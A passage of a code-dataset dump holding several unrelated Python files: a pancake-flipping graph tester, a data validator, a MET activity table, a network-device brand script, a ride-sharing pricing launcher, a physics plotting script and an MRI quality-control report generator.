new_name = node.name[:j + 1] + \"b\" + node.name[j + 1:]\n new_name = new_name[j:] + new_name[:j]\n subname = new_name[count + sides:]\n count = 0\n for l in range(0, len(subname)):\n if subname[l] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n # za\n new_name = new_name[:-count]\n count = 0\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n # boy\n count = 0\n new_name = new_name[:1 + 1] + new_name[1 + 1:] + \"b\"\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n return node\n\n\ndef lengths(tree, lengthsdict, length, nodeslist, targetname):\n if targetname == tree.name:\n lengthsdict[length] = 1\n for children in tree.children:\n if children.name not in nodeslist:\n nodeslist.append(children.name)\n lengths(children, lengthsdict, 0, nodeslist, children.name)\n else:\n length = length + 1\n for children in tree.children:\n lengths(children, lengthsdict, length, nodeslist, targetname)\n if children.name not in nodeslist:\n nodeslist.append(children.name)\n lengths(children, lengthsdict, 0, nodeslist, children.name)\n\n\ndef dicupdate(dictionary):\n if dictofLengths != dictionary:\n for index in range(0, len(dictionary)):\n if dictofLengths[index] == 0 and dictionary[index] == 1:\n dictofLengths[index] = dictionary[index]\n\n\ndef printingtree(tree, length):\n print(tree.name, \"at length: \", length)\n for children in tree.children:\n print(children, \"at length: \", length + 1)\n for children in tree.children:\n printingtree(children, length + 1)\n\n\ndef checkingvalues(tree, validelements, length):\n if tree.name not in validelements:\n print(\"ERROR, ERROR, We have an error at length: \", length)\n print(tree.name)\n for children in tree.children:\n checkingvalues(children, validelements, length + 1)\n\n\ncountingthings = 0\n\n\ndef checkingchildren(tree, validthings):\n for children in tree.children:\n global countingthings\n countingthings += 1\n if children.name not in validthings[tree.name]:\n print(\"ALARM ALARM PLEASE SAVE ME\")\n for children in tree.children:\n checkingchildren(children, validthings)\n\n\ncounter = 1\n\n\ndef countchildren(tree):\n for children in tree.children:\n global counter\n counter += 1\n countchildren(children)\n\n\npancakes = input(\"Enter the number of pancakes: \")\nsides = input(\"Enter the number of Sides per Pancake: \")\nwhile type(pancakes) != int:\n pancakes = input(\"\")\npancakes = int(pancakes)\nsides = int(sides)\nroot = \"\"\nfor pancake in range(1, pancakes + 1):\n root = root + str(pancake)\nroot = Tree(root)\nprint(root.name)\nside_count = 0\ndepth = 0\nroot = generating_tree_new(root, depth)\n\n\nvalidvalues = [\"12\", \"1b2\", \"1bb2\", \"2bb1bb\", \"2b1bb\", \"21bb\", \"12b\", \"2bb1b\", \"2b1b\", \"21b\", \"12bb\", \"1b2bb\", \"1bb2bb\",\n \"2b1\", \"21\", \"2bb1\", \"1b2b\", \"1bb2b\"]\nprint(len(validvalues))\ncheckingvalues(root, validvalues, 0)\n\n#print(root.name == \"12\")\ndictofLengths = {}\nlistofnodes = [root.name]\n\nfor i in range(0, 18 + 1):\n dictofLengths[i] = 0\n\n\n# Should be 3,4,6,8,9,10,12,13,14,15,18\nfor kid in root.children:\n lengths(kid, dictofLengths, 1, listofnodes, root.name)\n# lengths(root, dictofLengths, 0, listofnodes, root.name)\ndel dictofLengths[0]\nprint(dictofLengths)\n\nlistofvalidchildren = {\"12\": [\"1b2\", \"2b1b\"],\n \"1b2\": [\"1bb2\", \"2b1bb\"],\n \"1bb2\": [\"12\", \"2b1\"],\n \"2bb1bb\": [\"21bb\", \"12\"],\n \"2b1bb\": [\"2bb1bb\", \"12bb\"],\n \"21bb\": [\"2b1bb\", \"12b\"],\n \"12b\": [\"1b2b\", \"2bb1b\"],\n \"2bb1b\": [\"21b\", \"1bb2\"],\n \"2b1b\": [\"2bb1b\", \"1bb2bb\"],\n \"21b\": [\"2b1b\", \"1bb2b\"],\n \"12bb\": [\"1b2bb\", \"21b\"],\n \"1b2bb\": [\"1bb2bb\", \"21bb\"],\n \"1bb2bb\": [\"12bb\", \"21\"],\n \"2b1\": [\"2bb1\", \"1b2bb\"],\n \"21\": [\"2b1\", \"1b2b\"],\n \"2bb1\": [\"21\", \"1b2\"],\n \"1b2b\": [\"1bb2b\", \"2bb1bb\"],\n \"1bb2b\": [\"12b\", \"2bb1\"]}\n\ncheckingchildren(root, listofvalidchildren)\ncountchildren(root)\nif counter == (pow(2, 19) - 1):\n print(\"ELEELELELEL\")\nelse:\n print(\"we are sad\")\n print(counter)\nprint(countingthings)\n","sub_path":"IDS/Testing Graphs 2.py","file_name":"Testing Graphs 2.py","file_ext":"py","file_size_in_byte":9577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"91297533","text":"import numpy as np\nimport warnings\n\nclass validation():\n def _validate_data(self,X,y):\n \"\"\"检查矩阵是否缺失,X的长度是否与y相等\"\"\"\n if np.isnan(X).sum() or X is None:\n raise ValueError(\"X is invalid: it must not be nan or none\")\n if np.isnan(y).sum() or y is None:\n raise ValueError(\"y is invalid: it must not be nan or none\")\n if len(X) != len(y):\n raise ValueError(\"the length of X must be equal to y\")\n \n return X,y","sub_path":"慕课/机器学习/MyML/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"564141754","text":"import os\nimport sys\nimport libs.applibs.compendium.abstractcompendium as abstractcompendium\n\nclass HomeRepair(abstractcompendium.Compendium):\n\n def __init__(self):\n super().__init__()\n\n self.metValue = {6010 : 3.0\n ,6020 : 4.0\n ,6030 : 3.3\n ,6040 : 3.0\n ,6050 : 6.0\n ,6052 : 3.8\n ,6060 : 3.3\n ,6070 : 6.0\n ,6072 : 4.0\n ,6074 : 2.3\n ,6080 : 5.0\n ,6090 : 4.5\n ,6100 : 5.0\n ,6110 : 5.0\n ,6120 : 5.0\n ,6122 : 5.0\n ,6124 : 3.0\n ,6126 : 2.5\n ,6127 : 4.5\n ,6128 : 6.0\n ,6130 : 4.5\n ,6140 : 3.8\n ,6144 : 3.0\n ,6150 : 5.0\n ,6160 : 3.3\n ,6165 : 4.5\n ,6167 : 3.0\n ,6170 : 3.0\n ,6180 : 6.0\n ,6190 : 4.5\n ,6200 : 4.5\n ,6205 : 2.0\n ,6210 : 5.0\n ,6220 : 4.5\n ,6225 : 2.0\n ,6230 : 4.5\n ,6240 : 3.3 }\n\n # Unpacking with * works with any object that is iterable and, since dictionaries return their keys when iterated through, you can easily create a list by using it within a list literal.\n self.ckeys = [*self.metValue] # another option : list(self.metValue.keys())\n\n self.metDescription = {6010 : \"airplane repair\"\n ,6020 : \"automobile body work\"\n ,6030 : \"automobile repair, light or moderate effort\"\n ,6040 : \"carpentry, general, workshop (Taylor Code 620)\"\n ,6050 : \"carpentry, outside house, installing rain gutters (Taylor Code 640),carpentry, outside house, building a fence\"\n ,6052 : \"carpentry, outside house, building a fence\"\n ,6060 : \"carpentry, finishing or refinishing cabinets or furniture\"\n ,6070 : \"carpentry, sawing hardwood\"\n ,6072 : \"carpentry, home remodeling tasks, moderate effort\"\n ,6074 : \"carpentry, home remodeling tasks, light effort \"\n ,6080 : \"caulking, chinking log cabin\"\n ,6090 : \"caulking, except log cabin\"\n ,6100 : \"cleaning gutters\"\n ,6110 : \"excavating garage\"\n ,6120 : \"hanging storm windows\"\n ,6122 : \"hanging sheet rock inside house\"\n ,6124 : \"hammering nails\"\n ,6126 : \"home repair, general, light effort\"\n ,6127 : \"home repair, general, moderate effort\"\n ,6128 : \"home repair, general, vigorous effort\"\n ,6130 : \"laying or removing carpet\"\n ,6140 : \"laying tile or linoleum,repairing appliances\"\n ,6144 : \"repairing appliances\"\n ,6150 : \"painting, outside home (Taylor Code 650)\"\n ,6160 : \"painting inside house,wallpapering, scraping paint\"\n ,6165 : \"painting, (Taylor Code 630)\"\n ,6167 : \"plumbing, general\"\n ,6170 : \"put on and removal of tarp - sailboat\"\n ,6180 : \"roofing\"\n ,6190 : \"sanding floors with a power sander\"\n ,6200 : \"scraping and painting sailboat or powerboat\"\n ,6205 : \"sharpening tools\"\n ,6210 : \"spreading dirt with a shovel\"\n ,6220 : \"washing and waxing hull of sailboat or airplane\"\n ,6225 : \"washing and waxing car\"\n ,6230 : \"washing fence, painting fence, moderate effort\"\n ,6240 : \"wiring, tapping-splicing\"}\n\n self.metDescription_fr = {6010 : \"réparation d'un avion\"\n ,6020 : \"travailler sur la carrosserie d'une automobile\"\n ,6030 : \"réparation automobile, effort léger ou modéré\"\n ,6040 : \"menuiserie, général, atelier (code Taylor 620)\"\n ,6050 : \"menuiserie, extérieur de la maison, installer des gouttières, construire une clôture (code Taylor 640)\"\n ,6052 : \"menuiserie, extérieur de la maison, construire une clôture\"\n ,6060 : \"menuiserie, finition ou restauration de meubles\"\n ,6070 : \"menuiserie, scier du bois de feuillus\"\n ,6072 : \"menuiserie, travaux de rénovation résidentielle, effort modéré\"\n ,6074 : \"menuiserie, travaux de rénovation résidentielle, effort léger\"\n ,6080 : \"calfeutrer, isoler une cabane en bois\"\n ,6090 : \"calfeutrer, hors cabane\"\n ,6100 : \"nettoyer les gouttières\"\n ,6110 : \"creuser un garage\"\n ,6120 : \"poser des doubles fenêtres\"\n ,6122 : \"poser des plaques de plâtre à l’intérieur d’une maison\"\n ,6124 : \"planter des clous\"\n ,6126 : \"réparation domestique, général, effort léger\"\n ,6127 : \"réparation domestique, général, effort modéré\"\n ,6128 : \"réparation domestique, général, effort vigoureux\"\n ,6130 : \"poser ou retirer de la moquette\"\n ,6140 : \"poser du carrelage ou du linoléum, réparer des appareils\"\n ,6144 : \"réparer des appareils\"\n ,6150 : \"peindre, extérieur de la maison (code Taylor 650)\"\n ,6160 : \"peindre, intérieur de la maison, papier peint, décapage de peinture\"\n ,6165 : \"peindre, (code Taylor 630)\"\n ,6167 : \"plomberie, général\"\n ,6170 : \"poser et retirer une bâche – voilier\"\n ,6180 : \"poser la toiture\"\n ,6190 : \"poncer les sols avec une ponceuse\"\n ,6200 : \"décaper et peindre un voilier ou un hors-bord\"\n ,6205 : \"affûter des outils\"\n ,6210 : \"étaler de la terre à l'aide d'une pelle\"\n ,6220 : \"laver et cirer la coque d'un voilier ou un avion\"\n ,6225 : \"laver et cirer une voiture\"\n ,6230 : \"laver une clôture, peindre une clôture, effort modéré\"\n ,6240 : \"câblage, dériver-connecter\"} \n\n def printValues(self):\n print(\"Beginning dump for 'HomeRepair' \")\n super().printValues()\n\n def getMetValue(self, code):\n return super().getMetValue(code)\n\nif __name__ == \"__main__\":\n b = HomeRepair()\n b.printValues()\n print(b.getMetValue(6020))\n for l in b:\n print(l)","sub_path":"libs/applibs/compendium/c06homerepair.py","file_name":"c06homerepair.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583728672","text":"# -*- coding: utf-8 -*-\n# ver 1.0 -- 2017/11/6 --\n\nimport threading\nimport time\nimport xlrd\nimport xlsxwriter\n\n\nclass Util(object):\n \"\"\"None\"\"\"\n def __init__(self):\n None\n\n def list_split(self, l1, n=1):\n \"\"\"\n split l1 = [a1, a2, a3, a4, a5], n = 2\n return l2 = [[a1, a2], [a3, a4], [a5]]\n \"\"\"\n if (len(l1) % n) == 0:\n m = len(l1) // n\n else:\n m = len(l1) // n + 1\n l2 = [l1[i * n:(i + 1) * n] for i in range(m)]\n return l2\n\n def multi_task(self, obj, arg_list, n=1):\n \"\"\"type(arg_list) == list\"\"\"\n threadpool = []\n a = Util()\n arg_list = a.list_split(arg_list, n)\n for sub_arg_list in arg_list:\n # print(sub_arg_list)\n th = threading.Thread(target=obj, args=(sub_arg_list,))\n threadpool.append(th)\n for th in threadpool:\n th.start()\n for th in threadpool:\n threading.Thread.join(th)\n\n def get_dev_list(self, path):\n \"\"\"\n 根据CMDB导出的输入文件input.xlsx获取设备list\n \"\"\"\n dev_list = []\n input_data = xlrd.open_workbook(path) #'/Users/huaqiang/Downloads/input.xlsx')\n table = input_data.sheets()[0]\n row_count = table.nrows\n col_count = table.ncols\n for index in range(0, col_count):\n # print(table.row_values(0)[index])\n if table.row_values(0)[index].encode() == '站点名称'.encode():\n site_name_num = index\n if table.row_values(0)[index].encode() == '防火墙/路由器-LAN'.encode():\n lan_ip_num = index\n # print(site_name_num,lan_ip_num)\n for index in range(1, row_count):\n dev_info = {\n 'Site_name': table.row_values(index)[site_name_num],\n 'IP': table.row_values(index)[lan_ip_num]\n }\n dev_list.append(dev_info)\n return dev_list\n\n\ndef get_brand(dev_list):\n \"\"\"none\"\"\"\n brand_name = 'Null'\n for device in dev_list:\n #brand = NetDevMgmt(host=device['IP'], usr='', pwd='').get_fw_brand()\n if brand == 2:\n brand_name = 'Huawei'\n if brand == 1:\n brand_name = 'H3C'\n if brand == 0:\n brand_name = 'Sangfor'\n\n brand_info = {\n 'Site_name': device['Site_name'],\n 'IP': device['IP'],\n 'Brand': brand_name\n }\n brand_list.append(brand_info)\n\n\ndef main():\n \"\"\"none\"\"\"\n start = time.time()\n path = '/ops/NetMgmt/'\n threadpool = []\n dev_list = get_dev_list(path + 'input_file/input.xlsx')\n\n n = 10\n dev_list_new = list_spilit(dev_list, n)\n print(dev_list_new)\n\n for sub_dev_list in dev_list_new:\n th = threading.Thread(target=get_brand, args=(sub_dev_list,))\n threadpool.append(th)\n\n for th in threadpool:\n th.start()\n\n for th in threadpool:\n threading.Thread.join(th)\n\n workbook = xlsxwriter.Workbook(path + 'result/brand.xlsx')\n table = workbook.add_worksheet('brand')\n table.write(0, 0, 'Site')\n table.write(1, 0, 'IP')\n table.write(2, 0, 'Brand')\n\n row = 1\n for item in brand_list:\n table.write(row, 0, item['Site_name'])\n table.write(row, 1, item['IP'])\n table.write(row, 2, item['Brand'])\n row = row + 1\n\n workbook.close()\n\n end = time.time()\n print(end - start)\n\n\nif __name__ == '__main__':\n main()","sub_path":"scripts/modules/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"256833621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom setproctitle import setproctitle as ptitle\nfrom util.arg_parser import init_parser\nfrom pricing.onlineFairRSPricing import onlineFairRSPricing, fairness_metrics\nfrom util.utils import read_others\nimport numpy as np\nfrom datetime import datetime\nimport pandas as pd\n\nif __name__ == '__main__':\n print('################ START TIME: {} ################'.format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))\n\n parser = init_parser()\n args = parser.parse_args()\n ptitle('Pri_a{}_K{}_o{}'.format(args.a, args.K, args.omega))\n\n if not args.OMEGA: OMEGA = np.array([0.4, 0.42, 0.44, 0.46, 0.48, 0.5, 0.52, 0.54, 0.56, 0.58])\n else: OMEGA = [float(i) for i in args.OMEGA]\n\n if not args.pricingDays: pricingDays = [16, 17, 18, 19, 20] #[0.49, 0.5, 0.51, 0.52]\n else: pricingDays = [int(i) for i in args.pricingDays]\n\n # li = []\n # for day in pricingDays:\n # df = pd.read_csv('../data/haikou_10_{}_3km.csv'.format(day))\n # df = df.sort_values(by=['time_step'], ascending=[True])\n # li.append(df)\n # all_riders = pd.concat(li, axis=0, ignore_index=True)\n\n pricing_args = {\n 'OMEGA':OMEGA,\n 'omega': args.omega,\n 'a':args.a,\n 'K':args.K,\n 'eta_peak':args.eta_peak,\n 'eta_off':args.eta_off,\n 'sigma': args.sigma, #args.sigma\n 'days': pricingDays,\n 'threshold': args.threshold\n }\n\n\n onlineFairRSPricing(**pricing_args)\n\n # if len(pricingDays) > 1:\n # order_file = '../data/haikou_10_{}to{}_3km_default.csv'.format(pricingDays[0], pricingDays[1])\n # else:\n # order_file = '../data/haikou_10_{}_3km_default.csv'.format(pricingDays[0])\n #\n # fairness_metrics('ProfitOnly',K=args.K, order_file=order_file)\n\n print('################ END TIME: {} ################'.format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))","sub_path":"src/main_pricing.py","file_name":"main_pricing.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"494357907","text":"# The finalClosurePlots script extracts the raw 2D histograms made by the closureStudyPlotter script\n# and puts them into final presentable form. An example call would be:\n# python studies/finalClosurePlots.py --tag someTag --pfaY subpath/to/nominal --pfaX1 subpath/to/new\n\nimport sys, os, ROOT, argparse\n\nROOT.TH1.SetDefaultSumw2()\nROOT.gROOT.SetBatch(True)\nROOT.gStyle.SetOptStat(\"\")\nROOT.gStyle.SetPaintTextFormat(\"3.2f\")\nROOT.gStyle.SetFrameLineWidth(2)\nROOT.gStyle.SetErrorX(0)\n\ndef prettyHisto(histo, xLabelSize, yLabelSize, zLabelSize, xTitleSize, yTitleSize, zTitleSize, xOffset, yOffset, zOffset,color=ROOT.kBlack, special=True):\n\n histo.GetYaxis().SetLabelSize(yLabelSize); histo.GetYaxis().SetTitleSize(yTitleSize); histo.GetYaxis().SetTitleOffset(yOffset)\n histo.GetXaxis().SetLabelSize(xLabelSize); histo.GetXaxis().SetTitleSize(xTitleSize); histo.GetXaxis().SetTitleOffset(xOffset)\n\n if special:\n if \"TH2\" in histo.ClassName():\n histo.GetZaxis().SetLabelSize(zLabelSize); histo.GetZaxis().SetTitleSize(zTitleSize)\n\n if \"TH1\" in histo.ClassName():\n histo.Rebin(1)\n if histo.Integral() != 0: histo.Scale(1./histo.Integral())\n histo.SetLineWidth(4)\n histo.SetLineColor(color)\n\n if \"THStack\" in histo.ClassName() or \"TH1\" in histo.ClassName():\n histo.GetXaxis().SetRangeUser(0.23,2.98)\n\ndef prettyProfile(histo, name, color, markerStyle, pfa):\n\n firstyBin = 1; option = \"\"\n if \"ETCorr\" in name:\n firstyBin = 2\n option = \"s\"\n\n p = histo.ProfileX(\"p_%s_%s\"%(pfa,name), firstyBin, -1, option)\n p.SetMarkerStyle(markerStyle)\n p.SetMarkerSize(3)\n p.SetLineWidth(3)\n p.SetMarkerColor(color)\n p.SetLineColor(color)\n p.Sumw2()\n\n return p\n\ndef fillMap(pfaKey, inRootDir):\n\n if \"NULL\" in inRootDir: return\n\n MAPPFAHISTOS[pfaKey] = {}\n\n for histoFile in os.listdir(inRootDir):\n\n if \".root\" not in histoFile: continue\n histoFile = ROOT.TFile.Open(inRootDir + \"/\" + histoFile, \"READ\")\n for hkey in histoFile.GetListOfKeys():\n if \"TH\" not in hkey.GetClassName(): continue\n\n name = hkey.GetName()\n histo = hkey.ReadObj()\n histo.SetDirectory(0)\n\n histo.Sumw2()\n \n if name in MAPPFAHISTOS[pfaKey].keys(): MAPPFAHISTOS[pfaKey][name].Add(histo)\n else: MAPPFAHISTOS[pfaKey][name] = histo\n\ndef draw2DHistoAndProfile(canvas, keyName, histoName, zMax, color, markerStyle, line, drewRatio):\n\n canvas.cd()\n\n theHisto = MAPPFAHISTOS[keyName][histoName]\n\n pPFAX = prettyProfile(theHisto, histoName, color, markerStyle, keyName)\n\n if \"ETCorr\" in histoName: prettyHisto(theHisto, 0.050, 0.050, 0.050, 0.055, 0.055, 0.055, 1.0, 1.2, 1.0)\n else: prettyHisto(theHisto, 0.059, 0.059, 0.059, 0.072, 0.072, 0.072, 0.85, 0.72, 1.0)\n\n # Set some visual options for the actual 2D TP/RH\n if not drewRatio:\n theHisto.SetContour(255)\n\n if \"ETCorr\" in histoName:\n theHisto.GetXaxis().SetRangeUser(-0.25,20.25)\n theHisto.GetYaxis().SetRangeUser(-0.25,20.25)\n\n theHisto.GetXaxis().SetTitle(\"TP E_{T} [GeV] (t#bar{t}+0PU)\")\n theHisto.GetYaxis().SetTitle(\"TP E_{T} [GeV] (t#bar{t}+OOTPU)\")\n else: \n theHisto.GetYaxis().SetRangeUser(0.1,2.)\n\n theHisto.GetZaxis().SetRangeUser(1,zMax)\n theHisto.Draw(\"COLZ\")\n drewRatio = True\n \n # Sneak the line in so the profile is draw on top\n line.Draw(\"SAME\")\n pPFAX.Draw(\"EP SAME\")\n\n return drewRatio\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--tag\" , dest=\"tag\" , type=str, default=\"\" , help=\"Unique tag for output\")\n parser.add_argument(\"--pfaY\" , dest=\"pfaY\" , type=str, default=\"NULL\", help=\"Path to inputs for PFAY\")\n parser.add_argument(\"--pfaX1\" , dest=\"pfaX1\" , type=str, default=\"NULL\", help=\"Path to other PFAX dir\") \n parser.add_argument(\"--pfaX2\" , dest=\"pfaX2\" , type=str, default=\"NULL\", help=\"Path to other PFAX dir\") \n args = parser.parse_args()\n \n MAPPFAHISTOS = {}\n\n # Figure out the stub to use for the output directory\n # If neither pfaX1 or pfaX2 have been specified then quit!\n # The subtlety here is that pfaX1 takes precedence for the output directory\n if args.pfaX1 != \"NULL\": stub = args.pfaX1.split(\"Closure/\")[-1]\n elif args.pfaX2 != \"NULL\": stub = args.pfaX2.split(\"Closure/\")[-1]\n else: quit()\n\n tag = args.tag\n\n HOME = os.getenv(\"HOME\")\n OUTBASE = \"%s/nobackup/HCAL_Trigger_Study/plots/Closure\"%(HOME)\n INPUTLOC = \"%s/nobackup/HCAL_Trigger_Study/input/Closure\"%(HOME)\n\n # Save the input directories provided and fill the map of histos\n fillMap(\"PFAY\" , INPUTLOC + \"/\" + args.pfaY)\n fillMap(\"PFAX1\", INPUTLOC + \"/\" + args.pfaX1)\n fillMap(\"PFAX2\", INPUTLOC + \"/\" + args.pfaX2)\n\n # Set up the output directory and make it if it does not exist\n outpath = \"%s/%s/%s\"%(OUTBASE,stub,tag)\n if not os.path.exists(outpath): os.makedirs(outpath)\n\n # Save the final histograms\n for name in MAPPFAHISTOS.values()[0].keys():\n\n className = MAPPFAHISTOS.values()[0][name].ClassName()\n\n if \"TH2\" in className:\n zMax = 2e3 \n \n c1 = 0; line = 0\n if \"ETCorr\" in name:\n\n c1 = ROOT.TCanvas(\"%s\"%(name), \"%s\"%(name), 1600, 1440); c1.cd(); c1.SetLogz()\n\n ROOT.gPad.SetTopMargin(0.026)\n ROOT.gPad.SetBottomMargin(0.13)\n ROOT.gPad.SetLeftMargin(0.13)\n ROOT.gPad.SetRightMargin(0.14)\n\n ROOT.gPad.SetGridx()\n ROOT.gPad.SetGridy()\n\n line = ROOT.TLine(-0.25, -0.25, 20.65, 20.65) \n\n else:\n\n c1 = ROOT.TCanvas(\"%s\"%(name), \"%s\"%(name), 2400, 1440); c1.cd(); c1.SetLogz()\n\n ROOT.gPad.SetTopMargin(0.02625)\n ROOT.gPad.SetBottomMargin(0.13375)\n ROOT.gPad.SetLeftMargin(0.11)\n ROOT.gPad.SetRightMargin(0.12)\n\n line = ROOT.TLine(-28, 1, 28, 1) \n\n line.SetLineWidth(7)\n line.SetLineColor(ROOT.kBlack)\n line.SetLineStyle(7)\n\n drewRatio = False\n if \"PFAX1\" in MAPPFAHISTOS: drewRatio = draw2DHistoAndProfile(c1, \"PFAX1\", name, zMax, ROOT.kBlack , 20, line, drewRatio)\n if \"PFAX2\" in MAPPFAHISTOS: drewRatio = draw2DHistoAndProfile(c1, \"PFAX2\", name, zMax, ROOT.kPink+10, 20, line, drewRatio)\n if \"PFAY\" in MAPPFAHISTOS: drewRatio = draw2DHistoAndProfile(c1, \"PFAY\" , name, zMax, ROOT.kBlack , 4, line, drewRatio)\n\n ietaList = name.split(\"ieta\")[-1].split(\"to\")\n ietaStr = \"\"\n if len(ietaList) > 1: ietaStr = \"%s to %s\"%(ietaList[0],ietaList[1])\n else: ietaStr = \"%s\"%(ietaList[0])\n\n ietaText = ROOT.TPaveText(0.20, 0.86, 0.40, 0.95, \"trNDC\")\n ietaText.SetFillColor(ROOT.kWhite); ietaText.SetTextAlign(11); ietaText.SetTextFont(63); ietaText.SetTextSize(90)\n ietaText.AddText(\"|i#eta| = %s\"%(ietaStr))\n\n ietaText.Draw(\"SAME\")\n\n c1.SaveAs(\"%s/%s.pdf\"%(outpath,name))\n","sub_path":"scripts/studies/finalClosurePlots.py","file_name":"finalClosurePlots.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"331077458","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n# pylint: disable=no-member\n#\n# @Author: oesteban\n# @Date: 2016-01-05 11:33:39\n# @Email: code@oscaresteban.es\n# @Last modified by: oesteban\n# @Last Modified time: 2016-05-05 14:40:08\n\"\"\" Encapsulates report generation functions \"\"\"\n\nimport sys\nimport os\nimport os.path as op\nimport collections\nimport glob\nimport json\n\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nfrom .utils import find_failed, image_parameters\nfrom ..interfaces.viz_utils import plot_measures, plot_all\n\n# matplotlib.rc('figure', figsize=(11.69, 8.27)) # for DINA4 size\nSTRUCTURAL_QCGROUPS = [\n ['icvs_csf', 'icvs_gm', 'icvs_wm'],\n ['rpve_csf', 'rpve_gm', 'rpve_wm'],\n ['inu_range', 'inu_med'],\n ['cnr'], ['efc'], ['fber'], ['cjv'],\n ['fwhm_avg', 'fwhm_x', 'fwhm_y', 'fwhm_z'],\n ['qi1', 'qi2'],\n ['snr', 'snr_csf', 'snr_gm', 'snr_wm'],\n ['summary_mean_bg', 'summary_stdv_bg', 'summary_p05_bg', 'summary_p95_bg',\n 'summary_mean_csf', 'summary_stdv_csf', 'summary_p05_csf', 'summary_p95_csf',\n 'summary_mean_gm', 'summary_stdv_gm', 'summary_p05_gm', 'summary_p95_gm',\n 'summary_mean_wm', 'summary_stdv_wm', 'summary_p05_wm', 'summary_p95_wm']\n]\n\nFUNC_SPATIAL_QCGROUPS = [\n ['summary_mean_bg', 'summary_stdv_bg', 'summary_p05_bg', 'summary_p95_bg'],\n ['summary_mean_fg', 'summary_stdv_fg', 'summary_p05_fg', 'summary_p95_fg'],\n ['efc'],\n ['fber'],\n ['fwhm', 'fwhm_x', 'fwhm_y', 'fwhm_z'],\n ['gsr_%s' % a for a in ['x', 'y']],\n ['snr']\n]\n\nFUNC_TEMPORAL_QCGROUPS = [\n ['dvars'], ['gcor'], ['m_tsnr'], ['mean_fd'],\n ['num_fd'], ['outlier'], ['perc_fd'], ['quality']\n]\n\n\ndef workflow_report(qctype, settings=None):\n \"\"\" Creates the report \"\"\"\n import datetime\n\n dframe, failed = generate_csv(qctype, settings)\n sub_list = sorted(pd.unique(dframe.subject_id.ravel())) #pylint: disable=E1101\n\n if qctype == 'anat':\n qctype = 'anatomical'\n elif qctype == 'func':\n qctype = 'functional'\n\n out_dir = settings.get('output_dir', os.getcwd())\n work_dir = settings.get('work_dir', op.abspath('tmp'))\n out_file = op.join(out_dir, qctype + '_%s.pdf')\n\n result = {}\n func = getattr(sys.modules[__name__], 'report_' + qctype)\n\n imparams = image_parameters(dframe)\n pdf_group = []\n # Generate summary page\n out_sum = op.join(work_dir, 'summary_group.pdf')\n summary_cover({'modality': qctype, 'failed': 'none', 'params': imparams},\n is_group=True, out_file=out_sum)\n pdf_group.append(out_sum)\n\n # Generate group report\n qc_group = op.join(work_dir, 'qc_measures_group.pdf')\n # Generate violinplots. If successfull, add documentation.\n func(dframe, out_file=qc_group)\n pdf_group.append(qc_group)\n\n if len(pdf_group) > 0:\n out_group_file = op.join(out_dir, '%s_group.pdf' % qctype)\n # Generate final report with collected pdfs in plots\n concat_pdf(pdf_group, out_group_file)\n result['group'] = {'success': True, 'path': out_group_file}\n\n out_indiv_files = []\n # Generate individual reports for subjects\n for subid in sub_list:\n # Get subject-specific info\n subdf = dframe.loc[dframe['subject_id'] == subid]\n sessions = sorted(pd.unique(subdf.session_id.ravel()))\n plots = []\n sess_scans = []\n subparams = {}\n # Re-build mosaic location\n for sesid in sessions:\n sesdf = subdf.loc[subdf['session_id'] == sesid]\n scans = sorted(pd.unique(sesdf.run_id.ravel()))\n\n # Each scan has a volume and (optional) fd plot\n for scanid in scans:\n subparams[(sesid, scanid)] = imparams[(subid, sesid, scanid)]\n if 'anat' in qctype:\n fpdf = op.join(work_dir, 'anatomical_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n\n if op.isfile(fpdf):\n plots.append(fpdf)\n\n if 'func' in qctype:\n mepi = op.join(work_dir, 'meanepi_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n if op.isfile(mepi):\n plots.append(mepi)\n\n tsnr = op.join(work_dir, 'tsnr_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n if op.isfile(tsnr):\n plots.append(tsnr)\n\n framedisp = op.join(work_dir, 'fd_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n if op.isfile(framedisp):\n plots.append(framedisp)\n\n sess_scans.append('%s (%s)' % (sesid, ', '.join(scans)))\n\n # Summary cover\n sfailed = []\n if failed:\n sfailed = ['%s (%s)' % (s[1], s[2])\n for s in failed if subid == s[0]]\n out_sum = op.join(work_dir, '%s_summary_%s.pdf' % (qctype, subid))\n summary_cover(\n {'sub_id': subid, 'modality': qctype, 'included': \", \".join(sess_scans),\n 'failed': \",\".join(sfailed) if sfailed else \"none\",\n 'params': subparams},\n out_file=out_sum)\n plots.insert(0, out_sum)\n\n # Summary (violinplots) of QC measures\n qc_ms = op.join(work_dir, '%s_measures_%s.pdf' % (qctype, subid))\n\n func(dframe, subject=subid, out_file=qc_ms)\n plots.append(qc_ms)\n\n if len(plots) > 0:\n # Generate final report with collected pdfs in plots\n sub_path = out_file % subid\n concat_pdf(plots, sub_path)\n out_indiv_files.append(sub_path)\n 